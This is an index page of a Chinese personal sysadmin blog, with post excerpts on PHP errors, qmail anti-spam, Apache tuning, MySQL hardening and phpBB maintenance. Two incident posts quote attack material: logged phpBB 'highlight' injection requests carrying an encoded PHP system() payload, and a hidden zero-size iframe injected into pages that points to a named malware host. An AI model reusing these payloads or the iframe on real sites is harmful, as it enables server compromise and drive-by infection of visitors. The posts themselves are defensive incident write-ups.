首 页

2006 年 12 月 12 日

gd-jpeg: JPEG library reports unrecoverable error

Posted by kreny at 06:57 PM | 评论 (0) | 阅读全文

这几天主机上传照片居然出现了以下的问题:


gd-jpeg: [12-Dec-2006 18:05:33] PHP Warning: imagejpeg() [function.imagejpeg]: gd-jpeg: JPEG library reports unrecoverable error: in /home/hzmjp/public_html/includes/functions.php on line 383
百思不得其解。
的确最近升级了php 到 4.4.4(个人很不喜欢这个版本,不仅仅数字不好看,而且问题超多), 但是用的是以前的 config.nice 所以不太会有啥大问题。在 google 上找了这个问题,多半没有回答。
最终在 df 中找到了答案--磁盘满了,所以写不进去了,文件是建立了,但是 size 是 0。 如果有同样经历的朋友,先看看您的磁盘满了没~
汗! (--);

2006 年 11 月 07 日

PHPBB的一些维护SQL

Posted by kreny at 11:46 PM | 评论 (0) | 阅读全文

这里只作一个备份,不建议大家使用。

首先删除不存在的Group

DELETE FROM `phpbb_groups` WHERE group_id NOT IN (
SELECT group_id
FROM `phpbb_user_group`
)

接着删除不存在用户的Group

SELECT *
FROM `phpbb_user_group`
WHERE user_id NOT
IN (

SELECT user_id
FROM `phpbb_users`
)
AND user_id >0

找出注册却未登陆过的用户

SELECT user_id
FROM `phpbb_users`
where `user_lastvisit`= '0' and `user_id` > 0
ORDER BY `user_regdate` ASC;

SELECT * / DELETE
FROM `phpbb_user_group` WHERE user_id IN (
SELECT user_id
FROM `phpbb_users`
WHERE `user_lastvisit` = '0' AND `user_id` >0
)


SELECT * / DELETE
FROM `phpbb_users`
WHERE `user_lastvisit` = '0' AND `user_id` >0

2006 年 06 月 12 日

OpenPNE之GD安装记录

Posted by kreny at 04:32 PM | 评论 (1) | 阅读全文

老板要俺安装个 OpenPNE , 无奈之下试验了一下。
安装完毕后发现不能上传图片, Google 了一下,找到了一个解决方案,顺便在这里记录一下。

服务器原本的PHP配置:

'./configure'
'--with-mysql=/usr/local/mysql'
'--with-apxs2=/usr/local/apache2/bin/apxs'
'--with-openssl=/usr/local/ssl'
'--enable-mbstring=all'
'--enable-mbregex'
'--with-zlib'
'--with-dom'
'--with-oci8-instant-client=/usr/local/kdx/instantclient10_1'
'--enable-sigchild'
发现没有安装 GD library,于是补上。当然特别要注意的是 jpeg 的支持。

详细阅读: "OpenPNE之GD安装记录"

2005 年 10 月 13 日

GTK + GNOME + Xft + GIMP 的安装配置

Posted by kreny at 05:05 PM | 评论 (0) | 阅读全文

这次配置花了我两天时间,不过触及到了很多东西,还是挺有收获的。
主要目的是想在Miracle Linux下进行截屏,所以需要安装 GIMP ,由此引出了一系列的问题。

Miracle Linux 2.1 版本其实是一个很老的近似于 RedHat 6.x or 7.x 的 Linux 系统,但是结合了对 Oracle 的支持,所以由此得名。安装 GIMP 需要更高版本的 GTK, 而这需要一些 dependent 的 packages。
这次配置主要卡在了 Xft 的安装上面。原因主要还是对于 ld-config 的运用以及 /usr/local/lib 的设置没有熟练而造成的。特别是以下的问题。另外,对于像Miracle Linux 这样老掉牙的版本,我们在选择package 的时候,不能一味的追求高版本,有时候适当的选择相应的低版本会比较顺手。


  • Quote: http://mail.gnome.org/archives/gtk-list/2005-June/msg00112.html

    • RE: GTK Errors: Xft Pango backend is required for x11 target

    --------------------------------------------------------------------------------
    From: Xu Qiang
    To: Maximus , gtk-list gnome org
    Cc:
    Subject: RE: GTK Errors: Xft Pango backend is required for x11 target
    Date: Wed, 15 Jun 2005 09:57:03 +0800
    --------------------------------------------------------------------------------

    gtk-list-bounces gnome org wrote:
    > My GTK is getting Xft Pango backend is required for x11 target error.

    To let Pango compiles this backend, the correct compile/install order is Xft -> Pango -> Gtk.
    Note that Pango can't be compiled before Xft, otherwise the Xft backend will not be there.

    Regards,
    Xu Qiang

    GTK configure error

    checking Pango flags... -DXTHREADS -I/usr/local/include/pango-1.0 -I/usr/local/include -I/usr/include/freetype2 -I/usr/X11R6/i
    nclude -I/usr/local/include/freetype2 -I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include -L/usr/local/lib -lpan
    goxft-1.0 -lpangoft2-1.0 -lpangox-1.0 -lpango-1.0 -lgobject-2.0 -lgmodule-2.0 -ldl -lglib-2.0
    configure: error:
    *** Can't link to Pango. Pango is required to build
    *** GTK+. For more information see http://www.pango.org

    检查了一下,/usr/local/include/pango-1.0 的确存在。所以,可能需要重新注意这个 include 目录而编译一下 pango,或者使用最新版本 1.10.1

    详细阅读: "GTK + GNOME + Xft + GIMP 的安装配置"

    2005 年 04 月 25 日

    MTR:结合 ping + traceroute 的小工具

    Posted by kreny at 07:15 PM | 评论 (0) | TrackBack(0) | 阅读全文

    名称: MTR

    主页:http://www.bitwizard.nl/mtr/

    说明:mtr combines the functionality of the 'traceroute' and 'ping' programs in a single network diagnostic tool.

    下载地址: ftp://ftp.bitwizard.nl/mtr/

    安装方法:

    # tar -zxvf mtr-0.69.tar.gz

    # cd mtr-0.69

    # ./configure

    # make

    # make check

    # make install

    详细阅读: "MTR:结合 ping + traceroute 的小工具"

    2005 年 02 月 19 日

    受到了 howdark.com exploits

    Posted by kreny at 04:05 AM | 评论 (0) | TrackBack(0) | 阅读全文

    今天在我的 phpbb 论坛中受到了很多奇怪的访问,访问量大增的同时,apache 的log文件中有以下这些特殊的log文字:

    213.196.37.235 - - [19/Feb/2005:02:26:54 +0800] "GET /viewtopic.php?p=2936&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)
    %252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252
    Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr
    HTTP/1.0" 200 24984 "-" "Mozilla/4.0"
    137.111.13.34 - - [19/Feb/2005:02:29:29 +0800] "GET /viewtopic.php?p=1672&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)
    %252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252
    Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252
    HTTP/1.1" 200 32237 "-" "Opera/7.50"
    很显然是一种扫描或者爬虫。查询了很多关于 apache 和 phpbb 的资料,现在把这些东东都整理了一下。

    详细阅读: "受到了 howdark.com exploits"

    2005 年 01 月 29 日

    使用flickr的"BlogThis"功能连接你的blog

    Posted by kreny at 06:16 PM | 评论 (2) | TrackBack(0) | 阅读全文

    这里会自动填写标题:小船
    Originally uploaded by kreny.
    flickr 不仅仅是一个share图片的好去处,同时,使用 flickr 的 "BlogThis" 按钮可以把你在 flickr 上看到的你喜欢的图片方便地 blog 到你的 weblog 上,即使这并不是你的图片。
    本贴就是通过 Blog This photo 发布的。
    你有很多 layout 的选择,同时也可以 customize flickr 图片在你的 weblog 上的显示参数。

    详见:
  • Do you have a Blog?
  • Include your photos on your website

    • 2005 年 01 月 22 日

    MediaWiki 1.4beta5 安装手记

    Posted by kreny at 10:40 PM | 评论 (1) | TrackBack(0) | 阅读全文

    安装了 Wikipedia 使用的 mediawiki,建立了自己的 mediawiki。这里记录一下安装和配置过程。

  • MediaWiki 主页: http://wikipedia.sourceforge.net/

  • Source: mediawiki-1.4beta5.tar.gz

  • 下载和放置目录:
    • # wget mediawiki-1.4beta5.tar.gz
    # tar zxvf mediawiki-1.4beta5.tar.gz
    # ln -s mediawiki-1.4beta5 mediawiki (作 soft link 是个好习惯)
    # chmod a+w config (config 目录需要针对web可写,但是设置完毕后可以还原为只读。)
    接下来,可以从web访问你的 mediawiki,由于每台服务器的配置不同,下面列举了 mediawiki 的配置检查:

    详细阅读: "MediaWiki 1.4beta5 安装手记"

    2005 年 01 月 19 日

    Spam Comments 造成 MT 表格的损坏

    Posted by kreny at 08:41 PM | 评论 (0) | TrackBack(0) | 阅读全文

    这几天收到了很多 MT 的 Spammer 的 Spam Comments. 以前是简单地把这些 URL 加入了 Blacklist, 但是今天在删除回响的时候出现了以下错误信息:

    "Can't use an undefined value as a SCALAR reference at lib\MT\App\CMS.pm line 2176"
    虽然可以把这些垃圾留言都删除,但是始终无法浏览所有的回响。

    详细阅读: "Spam Comments 造成 MT 表格的损坏"

    2005 年 01 月 14 日

    关于加快 lilina 显示速度的一些设置

    Posted by kreny at 06:43 PM | 评论 (2) | TrackBack(2) | 阅读全文

    我的 lilina 在设定了几位朋友的 blog 和一些 news 以后,发现打开速度异常的慢,于是请教了车东,解决了问题。
    解决的关键在于:

    直接将以下语句加入到 index.php 头部即可,LILINA中你可以对MAGPIE的一些全局变量进行预设。
    define('MAGPIE_FETCH_TIME_OUT', 60 * 60 * 3);
    这方面我还是个外行,以下是具体请教的主要内容,暂且转用一下作为备份吧(已经得到作者同意刊登):
    PS: 作了一个 lilina 的图标,不知道像不像。 ;-P
    lilina.gif [Download file]
    (I tried to paint this logo, and please feel free to download the psd file.)

    详细阅读: "关于加快 lilina 显示速度的一些设置"

    2005 年 01 月 05 日

    升级 kernel 到 2.6.10

    Posted by kreny at 04:14 AM | 评论 (0) | TrackBack(0) | 阅读全文

    为了安装 VPN ,我把 kernel 加入了 ppp 模块并升级到了 2.6.10。
    今天的升级比较顺利。 嘿嘿~

    参考文档:

  • Kernel Rebuild Guide
    找到了原作者的老家,所以比较容易读懂。 ;-) 不过 Kwan 的主页上还有 mathmatics 噢~ 需要的朋友可以去看看

  • [原]在redhat as 3.0 上精简并编译系统内核(适用于初级用户)
    这篇最后对于重启的部分没有很好的说明,只看看那些硬件或者配置需要或不需要就可以了。

    • 我主要的配置过程中使用 make menuconfig 从现有的 rpm 升级的内核 2.6.9 中提取了原配置(/boot/config-2.6.9-1.667smp),然后在此基础上,去掉了不需要的模块:

    IEEE 1394 (FireWire) support
    Token Ring devices
    Parallel port support
    PCMCIA network device support
    IrDA (infrared) subsystem support
    ISDN support
    Graphic - vodoo3 etc.
    并 build in 了 ppp。
    以下是配置记录,红色处是重点或者需注意处。这里可以下载编译前的 2.6.9smp 的配置文件和 2.6.10 的 .config 文件。

    详细阅读: "升级 kernel 到 2.6.10"

    2004 年 12 月 17 日

    Troubleshooting for "Warning: Illegal offset type in ..." in PHP

    Posted by kreny at 02:08 AM | 评论 (0) | TrackBack(0) | 阅读全文

    System Environment:
    Red Hat 9.0 + Apache 2.0.52 + PHP 4.3.10 + Zend Optimizer v2.1.0 etc.

    Description:

    I upgraded PHP 4.3.9 to 4.3.10 and when I opened my sites like phpMyAdmin or Nucleus v2.5 beta, the page led to:

    Warning: Illegal offset type in abc.php on line 91
    Warning: Illegal offset type in abc.php on line 108

    After I downgraded PHP to 4.3.9, everything goes well.

    详细阅读: "Troubleshooting for "Warning: Illegal offset type in ..." in PHP"

    2004 年 12 月 16 日

    试装 MT-Blacklist 2.02a 来抵挡垃圾留言

    Posted by kreny at 11:38 PM | 评论 (1) | TrackBack(0) | 阅读全文

    今天在 MT 的主页上看到了一篇 Comment spam load issue, 于是就浏览了作者 Jay Allen 的 HP,找来了 MT-Blacklist 2.02a 试装了一下。

    参考地址:

  • Jamges Seng's solution for commments spams

  • Bayesian filter for MT

  • Movable Type Plugin Directory: Plugins Manager

  • Plugin Manager Install Error
    Can't use string ("Gavin Estey") as a HASH ref while "strict refs" in use at extlib/MT/Plugins/Manager.pm line 646.

  • 添加 trackback ping 的统计

    • 详细阅读: "试装 MT-Blacklist 2.02a 来抵挡垃圾留言"

    2004 年 12 月 15 日

    安装 Mutt 邮件客户端失败经历(问题已经解决)

    Posted by kreny at 09:40 PM | 评论 (0) | TrackBack(0) | 阅读全文

    安装 Mutt 邮件客户端失败经历 | Failure of Installing The Mutt E-Mail Client

    1. Mutt Home Page | Mutt 主页
    http://www.mutt.org/

    2.1 Download Mutt by CVS | 使用 CVS 下载 Mutt

    cvs -d :pserver:anonymous@cvs.mutt.org:/home/roessler/cvs login
    cvs -z3 -d :pserver:anonymous@cvs.mutt.org:/home/roessler/cvs co mutt

    2.2 Download Mutt by FTP | 下载 Mutt tarball

    wget ftp://ftp.mutt.org/mutt/mutt-1.4.2.1i.tar.gz

    详细阅读: "安装 Mutt 邮件客户端失败经历(问题已经解决)"

    2004 年 12 月 13 日

    试试 Gallery -- 一个不错的网络相册

    Posted by kreny at 02:45 PM | 评论 (2) | TrackBack(0) | 阅读全文

    寻找了很久网络相册程序,今天找到了 Gallery 后便试着安装了一下。

    下载安装需要 Gallery 1.4-pl2 , netpbm-gallery 1.4-pl2 (linux intel) ,ImageMagickTM 6.1jheadPHP GNU gettext (下载包),ffmpeg, language packs 和 gallery remote 。点击这里获得代码,同时作者的主页中也有详细的安装向导。多数只要下载了tarball以后,用 ./configure , make check , make install 即可编译安装成功。我的安装在 PHP GNU gettext support 上出了点问题,不过有了 language packages 所以也就忽视了。


    一些文件的位置: jhead 放在 netpbm 目录下,而 netpbm 放在 gallery 目录下即可。语言包放在 gallery/locale/ 下。

    需要注意的是 php 的环境设置问题,我在安装的时候就遇到了以下情况,但是作者对此作了详细的解答

    [Mon Dec 13 14:18:42 2004] [alert] [client 221.95.221.14] /home/gallery/setup/.htaccess: php_value not allowed here
    解决方法:在你的 httpd.conf 中添加以下内容即可。
    <Directory /home/gallery>
    AllowOverride Options FileInfo
    </Directory>
    另外就是 NetPBM 的安装问题了。一切解决之后,我们来讨论一下 php 的安全问题。

    详细阅读: "试试 Gallery -- 一个不错的网络相册"

    2004 年 12 月 11 日

    继续对 httpd <defunct> 的试验

    Posted by kreny at 05:19 PM | 评论 (0) | TrackBack(0) | 阅读全文

    最近的 httpd <defunct> 又频繁增多,主要原因现在还在寻找中。今天通宵看了很多文摘,同时也有所心得。现在把整个过程记录一下,以备后用。

    第一步,针对log 文件的2G 的limitation 作排除性工作。(关于 2G log 的讨论请看[internetworkers] httpd 。但是这个 bug 已经被修补。)

    这一步也就是清除以前的log文件,使用新的 cronolog 来使log文件进行循环记录。前几天已经对 cronolog 作了介绍,这里仅仅把在 httpd.conf 和 awstats.hostname.conf中修改的部分指摘一下。

    建立新 log 目录

    # mkdir /usr/local/apache2/log/weblog.kreny.com/
    httpd.conf 中的 log 部分的修改
    ErrorLog "|/usr/local/sbin/cronolog /usr/local/apache2/logs/weblog.kreny.com/weblog.kreny.com-error_log.%Y-%m"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/apache2/logs/weblog.kreny.com/weblog.kreny.com_log.%Y-%m" combined env=!LIMITIP
    awstats.weblog.conf中的修改
    LogFile="/usr/local/apache2/logs/weblog.kreny.com/weblog.kreny.com-access_log.%YYYY-1-%MM-1"
    备份好awstats的数据目录,在我的主机里面是 /var/lib/awstats/

    这样就排除了 2G log 的限制而导致 httpd 的问题。

    详细阅读: "继续对 httpd <defunct> 的试验"

    2004 年 11 月 29 日

    关于SQL Injection的经历

    Posted by kreny at 12:27 PM | 评论 (0) | TrackBack(0) | 阅读全文

    今天又体会了一下"愚人"的味道.早上起来发现bbs的帖子里面有人报告病毒,期初还不相信,没想到果然网页的title被人嵌入了<iframe> ,这里也报告一下这个网址吧,以后大家可要注意了.(千万别打开下面这个网址哦)
    嵌入代码:
    <iframe src=http://www.akoak.com/mf/1.htm width=0 height=0></iframe>

    查了一下果然是 icyfox.exe 搞的鬼. 点击这里查看所有关于 icyfox.exe 的解释

    Exceed PHP《用PHP函数解决SQL injection》 已经把问题说明的很清楚了。我居然没有把 PHP 的 magic-quotes-gpc 打开。 这次吸取教训了。
    详细请阅读: PHP 的 章 16. 安全

    关于 MySQL 的一些tips:
    参阅 8.5 The mysqlbinlog Binary Log Utility
    另外学到的是 /usr/local/mysql/yorudomain-bin.00x 是所有 mysql的执行记录,可以查询曾经的插入记录。

    另外,mysqlbinlog可以把2进制日志换成文本, 打开 binary 日志用
    mysqlbinlog binarylog | grep iframe | > attacker.sql

    详细阅读: "关于SQL Injection的经历"

    2004 年 10 月 28 日

    2004-10-28重启记录

    Posted by kreny at 10:19 PM | 评论 (0) | TrackBack(0) | 阅读全文

    因为连接不上服务器,所以只好叫同普机房的技术人员帮助重启了一下。
    很可惜没有继续保持下去。连接不上的原因还在调查中,初步定为apache的负荷问题。
    重启以后即可连接。
    本次开机时间是 2004年6月20日-- 2004年10月28日 的130多天。
    开机后发现邮件发送不正常。查看了 /var/log/messages 发现是 qmail-scanner 调用 clamvd 失败。原因是 /tmp/clamvd 在强行关机的时候没有被清除。 手动删除了 /tmp/clamvd ,然后启动clamv 一切恢复正常。

    /usr/local/sbin/clamd &

    阅读全文查看记录

    详细阅读: "2004-10-28重启记录"

    2004 年 10 月 05 日

    申请新域名

    Posted by kreny at 12:34 AM | 评论 (0) | TrackBack(0) | 阅读全文

    在 http://registerfly.com/ 申请了几个 .info 和 .name 的域名。
    感觉国外的hosting和domain的service非常的周全和合理。比起国内的万网的垄断性经营要好多了。

    2004 年 08 月 13 日

    2004-8-13服务器升级记录和portmap服务的收集

    Posted by kreny at 02:21 PM | 评论 (0) | TrackBack(0) | 阅读全文
    1. 升级php到4.3.8 用SSS7.08扫描到了几个漏洞,是存在于4.3.6上的,所以升级了一下php。(绑定的GB库解决了在qss画图失败的问题)
    2. 增加hosts.deny的内容 有人经常用端口扫描主机,并且连接22端口试图登陆。所以在/etc/hosts.deny下增加了以下内容
      ALL: 218.82.99.xxx
    3. 关掉了portmap (端口111)
      # chkconfig portmap off #kill -9 576
      这个还是心有余悸,毕竟对portmap的功能不是很清楚。不知道qmail是否要用到portmap。 测试结果,没有了portmap这个进程,qmail不能发送邮件,只能接收邮件。在queue里面有大量积压邮件。
    参考关于端口的解释:
    1. 什么是端口
      111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是 扫描系统查看允许哪些RPC服务的最早的一步。常 见RPC服务有:pc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提 供 服务的特定端口测试漏洞。记住一定要记录线路中的 daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生 了什么。
    2. portmap
      RPC サービスは、システムの任意のポートで実行できます。 クライアントがサーバ上の RPC サービスをアクセスするときは、 そのサービスが実行されているポートを見つける必要があります。 これには、まずクライアントがウェルノウン・ポート 111 上の portmapper プロセスに問い合わせます。 クライアントはサービスの RPC プログラム番号 を送信し、応答としてポート番号を取得します。 この時点から、クライアント・プログラムは RPC クエリーを新しく取得されたポートに送信します。
    3. Official Documents
      SUNRPC ポート・プローブ RFC1057 RFC1833

    详细阅读: "2004-8-13服务器升级记录和portmap服务的收集"

    2004 年 08 月 06 日

    去掉MySQL默认的3306对Internet端口

    Posted by kreny at 01:28 PM | 评论 (1) | TrackBack(0) | 阅读全文

    今天发现自己的MySQL有对外绑定的端口,感觉不太有用,因为我都是直接登陆主机运行MySQL的(MySQL的host里面都是localhost),所以想了一些方法解决这个问题。
    以下是事前查询的内容。

    netstat -anlp | grep mysql
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 638/mysqld
    unix 2 [ ACC ] STREAM LISTENING 12305521 638/mysqld /tmp/mysql.sock

    首先想了用Iptables阻挡所有对3306的连接。

    # iptables -A RH-Lokkit-0-50-INPUT -p tcp --destination-port 3306 -j REJECT

    可能是对Iptables学习不够,没有什么作用,还是扫描的出来有MySQL端口。
    查询了CU,发现有一篇正和我意的文章:如何更改 MYsql的 監聽 地址?
    里面对修改的建议是
    *安全配置*
    为了数据的安全,可以考虑让MySQL只守候在127.0.0.1上,这样从Internet上就无法直接访问数据库了。
    修改/etc/init.d/mysql文件
    在start部分找到类似下面这行
    $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file &

    修改成
    $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file --bind-address=127.0.0.1 &

    重起MySQL
    /etc/init.d/mysql restart

    最后netstat -l确认一下:
    tcp 0 0 localhost:mysql *:* LISTEN

    OK

    而我修改的应该是/usr/local/mysql/support-files/mysql.server 文件中的

    $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file >/dev/null 2>&1 & 为 $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file --bind-address=127.0.0.1 >/dev/null 2>&1 &

    重启mysql (kill了进程,然后用 /usr/local/mysql/support-files/mysql.server start)

    tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1041/mysqld
    unix 2 [ ACC ] STREAM LISTENING 12329772 1041/mysqld /tmp/mysql.sock

    即可!

    2004 年 07 月 13 日

    apache 速度爆慢的问题:MAX CLIENT 和 百度mp3搜索引擎

    Posted by kreny at 01:29 PM | 评论 (0) | TrackBack(1) | 阅读全文

    今天出现了apache打开速度爆慢的问题。检查如下:

    ping 的平均时间为 69 ms find /-ctime 1 没有什么大的变动 netstat -anlp | grep 80 | grep tcp | awk {'print $5'} | awk -F: {'print $1'}| sort |uniq -c | sort -nr 有将近145个httpd 的链接, 前几个的每个ip的连接数目都在 10-15左右。

    升级apache到2.0.50

    $ ./configure --enable-so --enable-speling --enable-rewrite --enable-ssl --with-ssl=/usr/local/ssl
    $ make
    $ apachectl stop
    $ make install
    $ apachectl start

    问题依然存在。 查看last 和 apache的log文件,并用SSS扫描主机,未发现侵入和漏洞。于是搜索CU上的问题,发现了这个帖子,根据里面的解释,可能是由于我的服务器的virtual hosts在不停地增加,而正常连接数目在不停地增大,而httpd.conf里面没有恰当设置 MAX CLIENT 造成的。

    修改了 httpd.conf 里面的 MAX CLIENT 为 256,问题解决!

    如果你要继续增加 MAX CLIENT 的数量,请见全文。
    推荐阅读 :RFC2616
    apache 速度爆慢的问题:MAX CLIENT 和 百度mp3搜索引擎
    感谢 HonestQiao

    详细阅读: "apache 速度爆慢的问题:MAX CLIENT 和 百度mp3搜索引擎"

    2004 年 07 月 08 日

    关于 favicon.ico 的小发现

    Posted by kreny at 02:45 PM | 评论 (0) | TrackBack(0) | 阅读全文

    在你的web服务器的log文件中,常常会看到关于 favicon.ico 文件的错误信息或者是正常记录。 一开始我也很疑惑这个icon到底是干什么的。 Dig了一下google,发现IE在将你的网站加入收藏夹的时候自动会搜寻你网站下的 /favicon.ico 文件(如果你没有特别指定的话),其实这就是我们常常说的收藏夹的图标文件。所以根据这个也可以统计有多少人将我们的网站加入了收藏夹。
    具体请看
    What is Favicon.ico? Personalise Your Site's Bookmark
    一些免费软件来制作你的 favicon.ico:
    Free Windows Resource Editors, Resource Compilers, Resource Hackers, Icon Editors

    David Yin's BLOG 写道:

    最后我用的方法是,先在PHOTOSHOP里把所要得内容制做好,存成TIF文件,然后用 PixelToolbox 1.1软件,把上面的TIF文件导入其中,再转存成favicon.ico。
    不过一般的情况下功能简单而且免费的 Icon Edit就足够了。

    2004 年 07 月 07 日

    用 man2html 做了一个unix 在线manpage

    Posted by kreny at 02:14 AM | 评论 (0) | TrackBack(0) | 阅读全文

    man2html 使用的是CGI语言,我将其转嫁到 php 页面上面,使得它可以直接导向静态页面,并使用了 URL Rewriting ,感觉还不错。

    动态页面:http://linux.dalouis.com/man2html/man.cgi
    静态页面:http://linux.dalouis.com/man2html/index.php

    具体代码请看全文

    详细阅读: "用 man2html 做了一个unix 在线manpage"

    2004 年 06 月 26 日

    自己Hack了一下MT3.1的文字编辑区的功能按钮

    Posted by kreny at 02:37 AM | 评论 (5) | TrackBack(3) | 阅读全文

    看了qinyu的【Hack-MT】增加文字编辑区的功能按钮,我自己也有蠢蠢欲动了。下载了qinyu的hack文件,发现这个是针对非3.0版本的,于是使用了他的几个不错的javascript function,对 Version 3.121 的MT的文字编辑区进行了修改。其中formatStyleStr 是修改了MT自带的功能 formatStr 而新建立的,其余function 都从qinyu中提取,一些图片是从,因为我还有一个Nucleus的blog,而且使用地非常顺手。先看看成果吧~

    functonbar.png

    详细阅读: "自己Hack了一下MT3.1的文字编辑区的功能按钮"

    2004 年 06 月 19 日

    新内核配好了~~ 累死了

    Posted by kreny at 12:13 AM | 评论 (1) | TrackBack(0) | 阅读全文

    周转了半天~还是用老办法解决了。无趣~~贴图吧
    200461604245715.jpg

    200461604450157.jpg

    200461604554646.jpg

    新内核会导致 rpm 出现问题,详细见内。

    详细阅读: "新内核配好了~~ 累死了"

    2004 年 06 月 14 日

    看看spamcontrol的战果

    Posted by kreny at 01:28 AM | 评论 (0) | TrackBack(0) | 阅读全文

    http://linux.dalouis.com/log/reject_mail.txt
    有了每一种阻止rules的记录。;)

    Last Update: Mon Jun 14 00:24:48 CST 2004

    Rejected by Spamcontrol:

    52 Reject: SNDR Bad_Helo
    33 Reject: RCPT Bad_Rcptto
    26 Reject: ORIG No_DNSMX
    21 Reject: SNDR Invalid_Relay
    12 Reject: RCPT Failed_Rcptto
    2 Reject: ORIG Bad_Mailfrom
    1 Reject: DATA Bad_MIME

    147 Totally Reject

    Rejected by SBL www.spamhaus.org:

    54 rblsmtpd:

    2004 年 06 月 12 日

    SPAMCONTROL patch for qmail的安装

    Posted by kreny at 02:06 AM | 评论 (0) | TrackBack(0) | 阅读全文
    今天重新打了qmail的patch,以前的所有patch用这个spamcontrol-2212 就解决了,同时也添加了很多 /var/qmail/control下面的文件。

    这里提供 spamcontrol patched 以后的qmail-1.03 的下载
    http://linux.dalouis.com/download/source/qmail/qmail-1.03-spam-patched.tgz

    配置了的文件有
    badmailfrom 通配符使用
    badrcptto whitelist or blacklist
    badhelo
    badmimetypes 非法附件
    RECIPIENTS Extension (only for non-blank-locals) 检查现有用户存在情况
    SMTP Authentication
    tarpit 限制本地用户一封多次投递 等等。
    另外还写了一段读取vpopmail所有用户名并写成邮件地址形式的代码。

    详细阅读: "SPAMCONTROL patch for qmail的安装"

    2004 年 06 月 04 日

    qmail被人家玩了一次

    Posted by kreny at 05:26 AM | 评论 (0) | TrackBack(0) | 阅读全文

    虽然说不上被黑,也没有任何危害,但是这个小混混帮我找到了一些需要改进的地方,还是得感谢它的~~ hoho~ 不过还要继续查下去.

    贴一个 grep的小技巧吧

    先 vi strings.file 加入想要找的 strings

    cat file | grep -f strings.file

    这样就会按(strings.file里面的)各行查找文件了。

    2004 年 05 月 21 日

    服务器日志 2004-5-21

    Posted by kreny at 02:36 AM | 评论 (0) | TrackBack(0) | 阅读全文

    服务器已经几个月没有升级了。今天来了个大行动,不过又是通宵阿~~ 郁闷... 留个时间为证~~

    详细阅读: "服务器日志 2004-5-21"

    2004 年 05 月 15 日

    今天完成了:让apache上的图片有防止盗链的功能

    Posted by kreny at 07:06 PM | 评论 (0) | TrackBack(1) | 阅读全文

    参考文档:
    Preventing Image 'Theft'

    SetEnvIfNoCase 和 SetEnvIf 的说明文档
    http://httpd.apache.org/docs-2.0/mod/mod_setenvif.html#setenvif

    httpd.conf 的修改处

    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # |******* Edited by Kreny **********|
    # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ######## Preventing Image 'Theft' ########
    ## http://apache-server.com/tutorials/ATimage-theft.html

    SetEnvIfNoCase Referer "^http://(.)+\.fjhr\.com/" local_ref=1
    SetEnvIfNoCase Referer "^http://(.)+\.hzmjp\.com/" local_ref=1
    SetEnvIfNoCase Referer "^http://(.)+\.dalouis\.com/" local_ref=1
    SetEnvIfNoCase Referer "^http://(.)+\.necktie\.gov\.cn/" local_ref=1
    SetEnvIfNoCase Referer "^http://(.)+\.necktie\.net\.cn/" local_ref=1
    SetEnvIfNoCase Referer "-" local_ref=1
    ######## Allow the LOGO image Theft ##########
    SetEnvIf Request_URI "/images/logo(.)+" local_ref=0
    <FilesMatch "\.(png|gif|jpg)">
    Order Allow,Deny
    Allow from env=local_ref
    <</FilesMatch>


    如果大家在看本网站的图片上有问题的话,请给我来信~~

    同时,比如像论坛一样的网站,很多图片都是论坛的按钮之类的,如果你不想记录图片信息,可以这样定制 log 文件:

    <FilesMatch "\.(png|gif|jpg)">
    SetEnv IMAGES 1
    </FilesMatch>
    ErrorLog logs/bbs.hzmjp.com-error_log
    CustomLog logs/bbs.hzmjp.com-access_log combined env=!IMAGES

    当然还可以用 SetEnvIf Request_URI 之类的语法定制,之后log里面就不会记录诸如 /templates/subSilver/images/spacer.gif 这样的附带图片记录了。

    2004 年 05 月 13 日

    做好了dalouis.com的花型上传人员统计

    Posted by kreny at 07:11 PM | 评论 (0) | TrackBack(0) | 阅读全文

    发现数组还是一块薄弱的地方,不过今天还算有点成绩,统计图片自动会伸缩并安排好长宽比例。新学了MySQL里面的"Group By"命令,可能对国内的计算机高手们来说的确是菜了点~~~
    今天下午还要和导师谈论文和考试的事情。不知道为什么,什么大的事情都在5月13号。三年前撞车也是。哎~~ 命中注定啊~ 呵呵,拣一日不如撞一日,随它去吧~~ :oops:

    :arrow: 点击查看截图

    2004 年 04 月 25 日

    反病毒垃圾邮件服务器完成(Clamav安装纪录)

    Posted by kreny at 09:20 PM | 评论 (1) | TrackBack(0) | 阅读全文

    4天连续的日夜颠倒,每天两顿饭,一次17个小时,总算把服务器搞定了!今天要出去放肆了~~~

    配置: qmail + spamassassin + sbl + clamv

    以下添加了Clamav安装纪录。

    详细阅读: "反病毒垃圾邮件服务器完成(Clamav安装纪录)"

    2004 年 04 月 20 日

    终于把邮箱升级完成了

    Posted by kreny at 12:52 PM | 评论 (0) | TrackBack(0) | 阅读全文

    其实也不是升级,把邮件服务器从 sendmail 转移到了 qmail, 本来想用 qmail 也照搬使用 linux 的user罢了,没想到还不行,一定要用virtual 的, 不过还好,总算是大功告成了,
    http://mail.dalouis.com/


    文档:
    http://blog.huangdong.com/comments.php?id=74_0_1_0_C


    安装记录:
    qmail的SMTP认证
    一直以来,我做qmail都没有使用smtp认证功能,今天要做一个mail system,为qmail加入这个功能也成为这次的目标之一。所以将qmail的有关smtp认证的资源找了一把。

